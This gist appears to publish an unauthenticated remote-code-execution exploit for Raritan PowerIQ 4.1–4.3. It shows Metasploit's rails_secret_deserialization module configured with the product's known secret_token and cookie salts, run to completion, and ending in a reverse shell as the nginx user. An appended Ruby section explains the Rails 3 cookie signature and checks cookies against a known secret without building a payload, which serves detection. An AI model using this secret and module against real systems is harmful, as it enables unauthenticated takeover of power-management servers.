brandonprry/f83917e0fcc3bf3ccd6b (GitHub Gist)
Last active August 29, 2015 14:16
Raritan PowerIQ 4.1/4.2/4.3 known session secret unauthenticated RCE
msf exploit(rails_secret_deserialization) > show options

Module options (exploit/multi/http/rails_secret_deserialization):

   Name             Current Setting                           Required  Description
   ----             ---------------                           --------  -----------
   COOKIE_NAME                                                no        The name of the session cookie
   DIGEST_NAME      SHA1                                      yes       The digest type used to HMAC the session cookie
   HTTP_METHOD      GET                                       yes       The HTTP request method (GET, POST, PUT typically work)
   Proxies                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RAILSVERSION     3                                         yes       The target Rails Version (use 3 for Rails3 and 2, 4 for Rails4)
   RHOST            192.168.0.20                              yes       The target address
   RPORT            443                                       yes       The target port
   SALTENC          BAh7CUkiCXNrZXkGOgZFRkkiFTgzMzVmNDY2ZDdmOTI2Y2IGOwBUSSINbGljZW5zZWQGOwBGVEkiD3Nlc3Npb25faWQGOwBUSSIlNGJlNzA2Nzk2NWFjYjFmNzU2ZThiY2IyNGVkNWM0MDMGOwBUSSIOcmV0dXJuX3RvBjsARiIGLw==  yes       The encrypted cookie salt
   SALTSIG          42df31d8a91b45e5ad3e9f3213dc5d6859df1cf8  yes       The signed encrypted cookie salt
   SECRET           8e238c9702412d475a4c44b7726a0537          yes       The secret_token (Rails3) or secret_key_base (Rails4) of the application (needed to sign the cookie)
   TARGETURI        /login/login                              yes       The path to a vulnerable Ruby on Rails application
   VALIDATE_COOKIE  true                                      no        Only send the payload if the session cookie is validated
   VHOST                                                      no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(rails_secret_deserialization) > exploit

[*] Started reverse handler on 192.168.0.19:4444
[*] Checking for cookie
[*] Adjusting cookie name to _session_id
[+] SECRET matches! Sending exploit payload
[*] Sending cookie _session_id
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729) at 2015-03-11 19:45:20 -0500

id
uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users)
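Added example, not part of brandonprry's gist or of the Metasploit module: the "Checking for cookie ... SECRET matches!" step in the transcript is a plain HMAC check of the Rails 3 signed-cookie format, `Base64(Marshal.dump(session))--hex(HMAC-SHA1(secret_token, base64_part))`, which is what the RAILSVERSION 3 and DIGEST_NAME SHA1 settings select. The Ruby below reproduces that check so you can tell whether a captured `_session_id` cookie was signed with a secret_token you already know (the SECRET value from the transcript is carried as a constant for that purpose); it builds no payload, and it only reaches `Marshal.load` after the signature verifies, because before that point the blob is attacker-controlled and deserializing it is exactly the RCE the transcript shows. The sample session, the made-up secret and the tampering cases are constructed here, not taken from a PowerIQ host.

```ruby
require 'base64'
require 'openssl'

# SECRET as set in the msfconsole transcript above; pass it to
# verify_rails3_cookie along with a cookie captured from a target.
GIST_SECRET_TOKEN = '8e238c9702412d475a4c44b7726a0537'

# hex HMAC over the Base64 part, as Rails 3 ActiveSupport::MessageVerifier does.
def rails3_sign(data_b64, secret, digest = 'SHA1')
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new(digest), secret, data_b64)
end

# Build a Rails 3 signed cookie: "<Base64(Marshal.dump(session))>--<hex hmac>".
def rails3_cookie(session_hash, secret, digest = 'SHA1')
  data = Base64.strict_encode64(Marshal.dump(session_hash))
  "#{data}--#{rails3_sign(data, secret, digest)}"
end

# Constant-time comparison so the checker itself does not leak the digest byte by byte.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Returns the decoded session hash if `cookie` was signed with `secret`, nil otherwise.
# Marshal.load runs only after the HMAC matched: an unverified blob is untrusted input.
def verify_rails3_cookie(cookie, secret, digest = 'SHA1')
  data, sig = cookie.to_s.split('--', 2)
  return nil if data.nil? || data.empty? || sig.nil? || sig.empty?
  return nil unless secure_equal?(rails3_sign(data, secret, digest), sig)
  Marshal.load(Base64.decode64(data))
end

# Constructed sample (hypothetical values): a session shaped like a PowerIQ
# _session_id cookie, signed with a made-up secret_token rather than a real one.
KNOWN_SECRET   = 'constructed-secret_token-for-the-example'
SAMPLE_SESSION = {
  'session_id' => '4be7067965acb1f756e8bcb24ed5c403',
  'return_to'  => '/',
  'licensed'   => false
}
SAMPLE_COOKIE  = rails3_cookie(SAMPLE_SESSION, KNOWN_SECRET)

# Signature replaced with 40 zero hex digits: same length, wrong value.
TAMPERED_SIG   = SAMPLE_COOKIE.sub(/--.*\z/, '--' + ('0' * 40))
# First byte of the Marshal blob altered, signature left intact.
TAMPERED_DATA  = 'A' + SAMPLE_COOKIE[1..]

if __FILE__ == $0
  puts "cookie: #{SAMPLE_COOKIE}"
  puts "known secret   -> #{verify_rails3_cookie(SAMPLE_COOKIE, KNOWN_SECRET).inspect}"
  puts "other secret   -> #{verify_rails3_cookie(SAMPLE_COOKIE, GIST_SECRET_TOKEN).inspect}"
  puts "tampered sig   -> #{verify_rails3_cookie(TAMPERED_SIG, KNOWN_SECRET).inspect}"
  puts "tampered data  -> #{verify_rails3_cookie(TAMPERED_DATA, KNOWN_SECRET).inspect}"
end
```

A non-nil result from `verify_rails3_cookie` against a documented or vendor-default secret_token is the same evidence the module acts on before sending its payload; on the defensive side it is the quickest way to confirm that a deployment still runs with that token, and rotating secret_token invalidates every cookie signed under the old one.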